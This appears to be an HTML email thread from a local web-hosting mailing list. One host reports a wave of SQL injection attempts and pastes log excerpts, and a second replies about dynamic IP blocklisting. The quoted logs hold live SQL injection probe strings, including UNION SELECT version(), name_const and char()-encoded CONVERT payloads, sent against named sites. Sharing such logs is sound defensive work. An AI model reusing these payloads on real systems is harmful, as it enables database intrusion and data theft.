<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<p>Hi Mik,</p>
<p>I don't host others' sites these days but I do keep a close eye
on suspicious requests to my pastebin site (dpaste.com) and
maintain a blocklist. Out of curiosity I looked for the IPs you
shared; none of them are currently on my list. No SQL injection
attempts either (though lots of 404s looking for wp-login.php).<br>
</p>
<p>Because of the whack-a-mole syndrome you identify, last year I
moved to a dynamic blocking setup. I have automation to detect and
block bad-behaving IPs; then I age them out if they go three days
without reoffending.</p>
<p>The list is typically 1000 to 2000 IPs long.<br>
</p>
<p>I've had good results from this, and zero complaints from users
whose IP happened to have been previously used by a
botnet/spammer.<br>
</p>
<p></p>
<p>Good luck!</p>
<p>P<br>
</p>
<p> </p>
<div class="moz-cite-prefix">On 2/15/21 2:53 PM, Michael Muller via
Hidden-discuss wrote:<br>
</div>
<blockquote type="cite"
cite="mid:26c6a1fb-cc9b-2115-1692-059518fc497a@montaguewebworks.com">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<p><font face="Calibri">Hey HT web hosts out there,</font></p>
<p><font face="Calibri">Due to recent hacking attempts against our
servers, I have installed an IP Tracker that tracks and blocks
any aggressive activity.</font></p>
<p><font face="Calibri">Starting late last week we've found a
growing number of IP numbers that appear to be attempting SQL
Injection attacks. I've pasted a few snippets from our logs,
below.</font></p>
<p><font face="Calibri">Anyone else seeing this kind of activity
on their servers? Every time I block an IP number they move to
another IP number. The list of IPs hitting us is growing, and
moving across multiple hosts.<br>
</font></p>
<p><font face="Calibri">So far, I've contacted four different
server hosts about the traffic coming from their servers. By
far the most "infected" appears to be the Unified Layer family
of hosting companies, which includes HostGator Mexico,
webhostbox Bigrock India, and a number of others. Additional
sources of the attacks are Hetzner.com from Germany; Ozkula
from Turkey; and ColoCrossing from Buffalo NY. I'm sure more
will be added as the days go on.<br>
</font></p>
<p><font face="Calibri">Stay safe.</font></p>
<p><font face="Calibri">Mik<br>
</font></p>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
</font></font></pre>
<pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
</font></font></pre>
<pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x</font></font>
</pre>
<pre class="moz-signature" cols="72">---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com" moz-do-not-send="true">http://MontagueWebWorks.com</a>
Powered by ROCKETFUSION</pre>
</blockquote>
<pre class="moz-signature" cols="72">--
Paul Bissex, software engineer
<a class="moz-txt-link-freetext" href="http://paulbissex.com/">http://paulbissex.com/</a>
Greenfield MA 01301 USA
413-230-9451</pre>
</body>
</html>